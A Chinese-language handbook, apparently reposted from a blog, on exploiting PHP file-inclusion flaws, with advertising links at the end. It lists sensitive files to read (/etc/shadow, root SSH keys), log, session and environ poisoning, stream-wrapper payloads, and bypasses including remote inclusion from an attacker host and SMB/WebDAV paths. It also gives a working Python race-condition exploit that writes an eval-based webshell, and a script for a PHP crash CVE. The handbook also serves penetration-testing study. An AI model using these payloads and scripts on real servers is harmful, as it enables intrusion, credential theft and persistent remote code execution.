    • 1.2 利用條件
    • 1.3 分類和利用思路
  • 2. 利用方法
    • 2.1 配合文件解析漏洞來包含
    • 2.2 讀取系統敏感文件（路徑遍歷）
    • 2.3 包含http日誌文件
    • 2.4 包含SSH日誌
    • 2.5 使用PHP偽協議
    • 2.6 配合phpinfo頁面包含臨時文件
    • 2.7 包含Session
    • 2.9 包含環境變量
  • 3. 繞過技巧
    • 3.1 限制路徑路徑
    • 3.2 限制後綴
    • 3.3 allow_url_include = off
    • 3.4 Base64 處理的session文件
    • 3.5 自己構造Session
    • 3.6 CVE-2018-14884

參考資料：
文件包含漏洞簡介
利用phpinfo條件競爭
PHP文件包含漏洞利用思路與Bypass總結手冊

1. 概述

什麼是文件包含：文件包含函數所加載的參數沒有經過過濾或者嚴格的定義，可以被用戶控制，包含其他文件或惡意代碼，導致信息泄露或代碼注入。

要求：包含的文件路徑攻擊者可控，被包含的文件web服務器可訪問。

1.1 常見的引發漏洞的函數：

1. include()執行到include時才包含文件，文件不存在時提出警告，但是繼續執行。
2. require()只要程序運行就會包含文件，文件不存在產生致命錯誤，並停止腳本。
3. include_once()和require_once()只執行一次，如果一個文件已經被包含，則這兩個函數不會再去包含（即使文件中間被修改過）。

當利用這四個函數來包含文件時，不管文件是什麼類型（圖片、txt等等），其中的文本內容都會直接作為php代碼進行解析。

1.2 利用條件

• 包含函數通過動態變量的方式引入需要包含的參數。

• PHP中只要文件內容符合PHP語法規範，不管是什麼後綴，都會被解析。

1.3 分類和利用思路

文件包含通常按照包含文件的位置分為兩類：本地文件包含（LFI）和遠程文件包含（RFI），顧名思義，本地文件包含就是指包含本地服務器上存儲的一些文件；遠程文件包含則是指被包含的文件不存儲在本地。

本地文件包含

1. 包含本地文件、執行代碼
2. 配合文件上傳，執行惡意腳本
3. 讀取本地文件
4. 通過包含日誌的方式GetShell
5. 通過包含/proc/self/envion文件GetShell
6. 通過偽協議執行惡意腳本
7. 通過phpinfo頁面包含臨時文件

遠程文件包含

1. 直接執行遠程腳本（在本地執行）

遠程文件包含需要在php.ini中進行配置，才可開啟：

allow_url_fopen = On：本選項激活了 URL 風格的 fopen 封裝協議，使得可以訪問 URL 對象文件。默認的封裝協議提供用 ftp 和 http 協議來訪問遠程文件，一些擴展庫例如 zlib 可能會註冊更多的封裝協議。（出於安全性考慮，此選項只能在 php.ini 中設置。）

allow_url_include = On：此選項允許將具有URL形式的fopen包裝器與以下功能一起使用：include，include_once，require，require_once。（該功能要求allow_url_fopen開啟）

2. 利用方法

2.1 配合文件解析漏洞來包含

http://target.com/?page=../../upload/123.jpg/.php

2.2 讀取系統敏感文件（路徑遍歷）

include.php?file=../../../../../../../etc/passwd

Windows：

​ C:\boot.ini //查看系統版本
​ C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置文件
​ C:\Windows\repair\sam //存儲系統初次安裝的密碼
​ C:\Program Files\mysql\my.ini //Mysql配置
​ C:\Program Files\mysql\data\mysql\user.MYD //Mysql root
​ C:\Windows\php.ini //php配置信息
​ C:\Windows\my.ini //Mysql配置信息

Linux：

/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_ras.keystore
/root/.ssh/known_hosts
/etc/passwd
/etc/shadow
/etc/my.cnf
/etc/httpd/conf/httpd.conf
/root/.bash_history
/root/.mysql_history
/proc/self/fd/fd[0-9]*(文件標識符)
/proc/mounts
/porc/config.gz

2.3 包含http日誌文件

通過包含日誌文件，來執行夾雜在URL請求或者User-Agent頭中的惡意腳本

1. 通過讀取配置文件確定日誌文件地址

   默認地址通常為：/var/log/httpd/access_log或/var/log/apache2/access.log

2. 請求時直接在URL後面加上腳本即可http://www.target.com/index.php<?php phpinfo();?>，之後去包含這個日誌文件即可。

3. 注意：日誌文件會記錄最為原始的URL請求，在瀏覽器地址欄中輸入的地址會被URL編碼，通過CURl或者Burp改包繞過編碼。

apache+Linux 日誌默認路徑
/etc/httpd/logs/access_log
/var/log/httpd/access_log
xmapp日誌默認路徑
D:/xampp/apache/logs/access.log
D:/xampp/apache/logs/error.log
IIS默認日誌文件
C:/WINDOWS/system32/Logfiles
%SystemDrive%/inetpub/logs/LogFiles
nginx
/usr/local/nginx/logs
/opt/nginx/logs/access.log

通過包含環境變量/proc/slef/enversion來執行惡意腳本，修改HTTP請求的User-Agent報頭，但是沒復現成功

2.4 包含SSH日誌

和包含HTTP日誌類似，登錄用戶的用戶名會被記錄在日誌中，如果可以讀取到ssh日誌文件，則可以利用惡意用戶名注入php代碼。

SSH登錄日誌常見存儲位置：/var/log/auth.log或/var/log/secure

2.5 使用PHP偽協議

PHP內置了很多URL 風格的封裝協議，除了用於文件包含，還可以用於很多文件操作函數。在phpinfo的Registered PHP Streams中可以找到目前環境下可用的協議。

file:// — 訪問本地文件系統
http:// — 訪問 HTTP(s) 網址
ftp:// — 訪問 FTP(s) URLs
php:// — 訪問各個輸入/輸出流（I/O streams
zlib:// — 壓縮流
data:// — 數據（RFC 2397）
glob:// — 查找匹配的文件路徑模式
phar:// — PHP 壓縮文件
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音頻流
expect:// — 處理交互式的流

1. file://訪問本地文件系統http://target.com/?page=file://D:/www/page.txt，正反斜線都行（windows），對於共享文件服務器可以使用\\smbserver\share\path\to\winfile.ext。

2. php://input訪問輸入輸出流：?page=php://input，在POST內容中輸入想要執行的腳本。

3. php://filter：是一種元封裝器， 設計用於數據流打開時的篩選過濾應用。

   全部可用過濾器列表：https://www.php.net/manual/zh/filters.php

   通常利用該偽協議來讀取php源碼，通過設定編碼方式（以base64編碼為例），可以防止讀取的內容被當做php代碼解析，利用方式（就是read寫不寫的區別）：

   index.php?file=php://filter/read=convert.base64-encode/resource=index.php
   index.php?file=php://filter/convert.base64-encode/resource=index.php
   

4. data://數據流封裝：?page=data://text/plain,腳本

1. zip://壓縮流：創建惡意代碼文件，添加到壓縮文件夾，上傳，無視後綴。通過?page=zip://絕對路徑%23文件名訪問，5.2.9之前是只能絕對路徑。

備註：

1. 文件需要絕對路徑才能訪問

2. 需要通過#（也就是URL中的%23）來指定代碼文件

3. compress.bzip2://和compress.zlib://壓縮流，與zip類似，但是支持相對路徑，無視後綴

   bzip和gzip是對單個文件進行壓縮（不要糾結要不要指定壓縮包內的文件）

   ?file=compress.bzip2://路徑
   ?file=compress.zlib://路徑
   

4. phar://支持zip、phar格式的壓縮（歸檔）文件，無視後綴（也就是說jpg後綴照樣給你解開來），?file=phar://壓縮包路徑/壓縮包內文件名，絕對路徑和相對路徑都行。

   利用方法：

   index.php?file=phar://test.zip/test.txt
   index.php?file=phar://test.xxx/test.txt
   

   製作phar文件（php5.3之後）：

   1. 設置php.ini中phar.readonly=off
   2. 製作生成腳本

   <?php 
   @unlink("phar.phar");
   $phar = new Phar("phar.phar");
   $phar->startBuffering();
   $phar->setStub("<?php __HALT_COMPILER(); ?>"); //設置stub
   $phar->addFromString("test.txt", "<?php phpinfo();?>"); //添加要壓縮的文件及內容
   $phar->stopBuffering(); //簽名自動計算
   ?>
   // 這個腳本需要使用php.exe 來生成
   

   1. 生成腳本2

      <?php
      $p = new PharData(dirname(__FILE__).'./test.123', 0,'test',Phar::ZIP);
      $p->addFromString('test.txt', '<?php phpinfo();?>');
      ?>
      //這個腳本可以通過訪問來觸發，在本地生成一個test.123，但是不能生成後綴為phar的文件（其他的都行，甚至是php）
      

2.6 配合phpinfo頁面包含臨時文件

向phpinfo頁面上傳文件的時候，phpinfo會返回臨時文件的保存路徑

臨時文件存活時間很短，當連接結束后，臨時文件就會消失。條件競爭

只要發送足夠多的的數據，讓頁面還未反應過來的時候去包含文件，即可。

1. 發送包含了webshell的上傳數據包給phpinfo頁面，這個數據包的header、get等位置需要塞滿垃圾數據

2. 因為phpinfo頁面會將所有數據都打印出來，1中的垃圾數據會將整個phpinfo頁面撐得非常大

3. php默認的輸出緩衝區大小為4096，可以理解為php每次返回4096個字節給socket連接

4. 所以，我們直接操作原生socket，每次讀取4096個字節。只要讀取到的字符里包含臨時文件名，就立即發送第二個數據包

5. 此時，第一個數據包的socket連接實際上還沒結束，因為php還在繼續每次輸出4096個字節，所以臨時文件此時還沒有刪除

6. 利用這個時間差，第二個數據包，也就是文件包含漏洞的利用，即可成功包含臨時文件，最終getshell

   利用腳本exp

2.7 包含Session

1. PHP將用戶Session以文件的形式保存在主機中，通過php.ini文件中的session.save_path字段可以設置具體的存儲位置，通過phpinfo頁面也可以查詢到；文件命名格式為：sess_<PHPSESSID>，其中PHPSESSID為用戶cookie中PHPSESSID對應的值；Session文件一些可能的保存路徑：

   /var/lib/php/sess_PHPSESSID
   /var/lib/php/sessions/sess_PHPSESSID
   /tmp/sess_PHPSESSID
   /tmp/sessions/sess_PHPSESSID
   

2. Session文件內容有兩種記錄格式：php、php_serialize，通過修改php.ini文件中session.serialize_handler字段來進行設置。

   以php格式記錄時，文件內容中以|來進行分割：

   以php_serialize格式記錄時，將會話內容以序列化形式存儲：

3. 如果保存的session文件中字符串可控，那麼就可以構造惡意的字符串觸發文件包含。

   先構造一個含有惡意字符串的session文件：?user=test&cmd=<?php phpinfo();?>，之後包含這個會話的session文件。

2.9 包含環境變量

CGI****利用條件：1231、php以cgi方式運行，這樣environ才會保存UA頭。``2、environ文件存儲位置已知，且environ文件可讀。利用姿勢：proc/self/environ中會保存user-agent頭。如果在user-agent中插入php代碼，則php代碼會被寫入到environ中。之後再包含它，即可。

3. 繞過技巧

3.1 限制路徑路徑

服務器限制了訪問文件的路徑，例如在變量前面追加'/var/www/html'限制只能包含web目錄下的文件，可以利用路徑穿越進行對抗。

../../../../../../../ect/passwd

對於輸入有過濾的情況，可以嘗試用URL編碼進行轉換，比如%2e%2e%2f，甚至是二次轉換。

3.2 限制後綴

對用戶輸入添加後綴，比如：自動添加.jgp後綴、或者期望用戶輸如一個父目錄，服務器自動拼接上子目錄和文件。

1. 如果是遠程文件包含的話可以利用URL的特性：?、#

   構造出類似於http://test.com/evil.php?/static/test.php和http://test.com/evil.php#/static/test.php的包含路徑，使得服務器預設的後綴變成URL的參數或者頁面錨點。

2. 利用壓縮協議：構建一個壓縮包歸檔文件，裡面包含上服務器加的後綴，這樣完整的路徑將指向壓縮包內文件。

   比如壓縮包中文件為test.zip->test->defautl->test.php ，構造url：include.php?file=phar://test.zip/test，服務端拼接后變成include('phar://test.zip/test/defautl/test.php')

3. 利用超長字符串進行截斷，在php<5.2.8的版本可以設置一個超級長的路徑，超過的部分將被服務器丟棄。

   win最長為256字節、Linux為4096字節，構造include.php?file=./././././(n多個）././test.php

4. 利用00截斷：php<5.3.4時可用%00對字符串進行截斷，%00被是識別為字符串終止標記。

3.3 allow_url_include = off

利用SMB、webdav等使用UNC路徑的文件共享進行繞過。

1. 利用SMB（只對Win的web服務器有效）：構建SMB服務器后，構造URL：?include.php?file=\\172.16.97.128\test.php
2. 利用WebDAV：構造連接?include.php?file=//172.16.97.128/webdav/test.php

3.4 Base64 處理的session文件

為了保護用戶的信息或存儲更多格式的信息，很多時候都會對Session文件進行編碼，以Base64編碼為例，闡述繞過思路。了解服務端使用的編碼模式以及對應的解碼模式；合理安排payload使其滿足解碼條件，只要不干擾php代碼運行就可以。

1. 根據上邊介紹的偽協議的用法，可以知道使用index.php?file=php://filter/read=convert.base64-decode/resource=index.php即可對base64編碼的文件進行解碼，但是直接解碼session文件時會出現亂碼。其原因在於session文檔中包含的並非全部都是base64編碼的內容，session開頭的user|s:24:字符串也被當做base64進行解碼，從而導致出現亂碼的情況，因此如果能忽略前面的字符，就可以完美解碼了。

2. 有利條件：PHP在進行base64解碼的時候並不會去處理非Base64編碼字符集的內容，直接忽略過去並拼接之後的內容。也就是說，Session文件中的:、|、{}、;、"這類字符對Base64解碼沒有影響。

3. Base64解碼過程簡單來說就是：將字符串按照每4個字符分為一組，解碼為二進制數據流再拼接到一起，因此要保證我們可以將payload正確解出，需要將編碼后的payload其實位置控制在4n+1的位置（第5、9、13…位）。（base64編碼后長度為原數據長度的4/3）

4. user:|s:24:"有效字符有7個，若要將payload置於第9位，則需要再增加一個字符，簡單有效的辦法就是讓24變成一個三位數——填充無效數據擴充payload長度。

5. serialize模式同理，session文件中a:1:{s:4:"user";s:24:"共11個干擾字符，因此同樣只需將payload產生的字符串長度增加到三位數即可。

3.5 自己構造Session

有的網站可能不提供用戶會話記錄，但是默認的配置可以讓我們自己構造出一個Session文件。相關的選項如下：

• session.use_strict_mode = 0，允許用戶自定義Session_ID，也就是說可以通過在Cookie中設置PHPSESSID=xxx將session文件名定義為sess_xxx
• session.upload_progress.enabled = on，PHP可以在每個文件上傳時監視上傳進度。
• session.upload_progress.name = "PHP_SESSION_UPLOAD_PROGRESS"，當一個上傳在處理中，同時POST一個與INI中設置的session.upload_progress.name同名變量時，上傳進度可以在$_SESSION中獲得。 當PHP檢測到這種POST請求時，它會在$_SESSION中添加一組數據, 索引是session.upload_progress.prefix與 session.upload_progress.name連接在一起的值。

利用思路：

1. 上傳一個文件

2. 上傳時設置一個自定義PHPSESSIDcookie

3. POST PHP_SESSION_UPLOAD_PROGRESS惡意字段："PHP_SESSION_UPLOAD_PROGRESS":'<?php phpinfo();?>'

   這樣就會在Session目錄下生成一個包含惡意代碼的session文件。

4. 但是php默認設置中會打開session.upload_progress.cleanup = on，也就是當文件上傳完成後會自動刪除session文件，使用條件競爭繞過，惡意代碼功能設置為生成一個shell.php。

利用exp：

import io
import sys
import requests
import threading

sessid = 'test'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://127.0.0.1/index.php',
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php phpinfo();fputs(fopen('shell.php','w'),'<?php @eval($_POST[test])?>');?>"},
            files={"file":('q.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'http://127.0.0.1/include.php?file=D:\\phpstudy_pro\\Extensions\\tmp\\tmp\\sess_{sessid}')
        # print('[+++]retry')
        # print(response.text)

        if 'PHP Version' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)

with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)

3.6 CVE-2018-14884

CVE-2018-14884會造成php7出現段錯誤，從而導致垃圾回收機制失效，POST的文件會保留在系統緩存目錄下而不會被清除。

影響版本：

PHP Group PHP 7.0.*，<7.0.27
PHP Group PHP 7.1.*，<7.1.13
PHP Group PHP 7.2.*，<7.2.1

windows 臨時文件：C:\windows\php<隨機字符>.tmp

linux臨時文件：/tmp/php<隨機字符>

1. 漏洞驗證include.php?file=php://filter/string.strip_tags/resource=index.php返回500錯誤

2. post惡意字符串

   import requests
   
   files = {
     'file': '<?php phpinfo();'
   }
   url = 'http://127.0.0.1/include.php?file=php://filter/string.strip_tags/resource=index.php'
   r = requests.post(url=url, files=files, allow_redirects=False)
   

3. 在臨時文件中可以看到惡意代碼成功寫入

4. 至於包含嘛，爆破或者其他手段探測這個臨時文件吧。

本站聲明:網站內容來源於博客園,如有侵權,請聯繫我們,我們將及時處理

【其他文章推薦】

※網頁設計一頭霧水該從何著手呢? 台北網頁設計公司幫您輕鬆架站!

※網頁設計公司推薦不同的風格，搶佔消費者視覺第一線

※想知道購買電動車哪裡補助最多?台中電動車補助資訊懶人包彙整

※南投搬家公司費用,距離,噸數怎麼算?達人教你簡易估價知識!

※教你寫出一流的銷售文案?

※超省錢租車方案

※回頭車貨運收費標準